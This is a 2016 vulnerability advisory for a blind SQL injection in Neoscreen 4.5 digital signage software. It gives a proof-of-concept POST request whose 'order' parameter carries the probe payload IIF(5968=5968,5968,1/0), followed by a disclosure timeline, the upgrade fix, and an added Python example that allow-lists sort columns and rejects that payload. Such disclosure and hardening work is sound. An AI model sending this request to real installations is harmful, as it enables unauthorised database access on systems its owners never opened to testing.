Neoscreen 4.5 Blind SQL Injection

2016.07.26
Credit: Alex Haynes
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Exploit Title: Neoscreen Blind SQL injection
Product: Neoscreen by Cube Digital Media
Vulnerable Versions: 4.5 and all previous versions
Tested Version: 4.5
Advisory Publication: July 24, 2016
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]
CVE Reference: NONE
Credit: Alex Haynes

Advisory Details:

(1) Vendor & Product Description
--------------------------------
Vendor: Cube Digital Media
Product & Version: Neoscreen digital signage software v4.5
Vendor URL & Download: http://www.cube-display.fr
Product Description: "Neoscreen is an innovative, scalable and particularly powerful communication system. With just a few clicks, you can control all your dynamic display screens from your PC, wherever they may be in the world."

(2) Vulnerability Details:
--------------------------
Several URLs in the management software are vulnerable to SQL injection attacks.

Proof of concept:

POST to /cubelocal/modules/neoscreen/admindiff/stats_diffusion.asp?mod_stat=&machine_id=0&idpod=0 HTTP/1.1

Vulnerable parameter: order

Payload (request body):
idpod_choisi=tous&periodeMM=1&periodeMMFin=12&periodeAA=2015&order=IIF(5968=5968,5968,1/0)&orders=0

(3) Advisory Timeline:
----------------------
25/01/2016 - First contact: vendor responds saying they are working on a fix.
24/02/2016 - Follow-up e-mail to request a fix timeline. No vendor response.
03/03/2016 - Follow-up e-mail to request a fix timeline.
04/03/2016 - Vendor responds saying the fix will be available 14/03/2016.

(4) Solution:
-------------
Upgrade to version 5.0.

(5) Credits:
------------
Discovered by Alex Haynes
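The flaw above is a sort parameter reaching the query unneutralized. The following is an added mitigation example written for this page; it is not Neoscreen's code. It assumes the "order" and "orders" parameters select an ORDER BY column and direction (the advisory names the parameter but not the query), and the table and column names are constructed placeholders. Since ORDER BY identifiers cannot be bound as parameters, the only safe handling is to map the untrusted value onto an allow-list and bind everything else.

```python
import sqlite3

# Assumed (constructed) schema: the advisory does not document Neoscreen's tables.
ALLOWED_ORDER_COLUMNS = {"machine_id", "idpod", "periode_mm", "nb_diffusions"}
ALLOWED_DIRECTIONS = {"0": "ASC", "1": "DESC"}  # 'orders' assumed to be a direction flag


def is_safe_order(order, orders="0"):
    """True only if both sort parameters are on the allow-lists."""
    return order in ALLOWED_ORDER_COLUMNS and orders in ALLOWED_DIRECTIONS


def build_stats_query(form):
    """Build the stats query: filters are bound, ORDER BY uses allow-listed identifiers only."""
    order, orders = form.get("order", ""), form.get("orders", "0")
    if not is_safe_order(order, orders):
        # The advisory's payload IIF(5968=5968,5968,1/0) is rejected here, before any SQL exists.
        raise ValueError("rejected sort parameter: %r" % order)
    sql = ("SELECT machine_id, idpod, periode_mm, nb_diffusions FROM stats_diffusion "
           "WHERE periode_aa = ? AND periode_mm BETWEEN ? AND ? "
           "ORDER BY %s %s" % (order, ALLOWED_DIRECTIONS[orders]))
    # int() also rejects non-numeric period values instead of passing them to the database.
    args = [int(form["periodeAA"]), int(form["periodeMM"]), int(form["periodeMMFin"])]
    return sql, args


def query_stats(form):
    """Run the hardened query against a constructed in-memory table and return the rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE stats_diffusion "
                "(machine_id, idpod, periode_aa, periode_mm, nb_diffusions)")
    con.executemany("INSERT INTO stats_diffusion VALUES (?,?,?,?,?)", [
        (1, 10, 2015, 1, 40), (2, 11, 2015, 6, 75),
        (3, 12, 2015, 12, 12), (4, 13, 2016, 2, 99),
    ])
    sql, args = build_stats_query(form)
    return con.execute(sql, args).fetchall()


if __name__ == "__main__":
    ok = {"periodeAA": "2015", "periodeMM": "1", "periodeMMFin": "12",
          "order": "nb_diffusions", "orders": "1"}
    print(query_stats(ok))
    print(is_safe_order("IIF(5968=5968,5968,1/0)", "0"))
```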

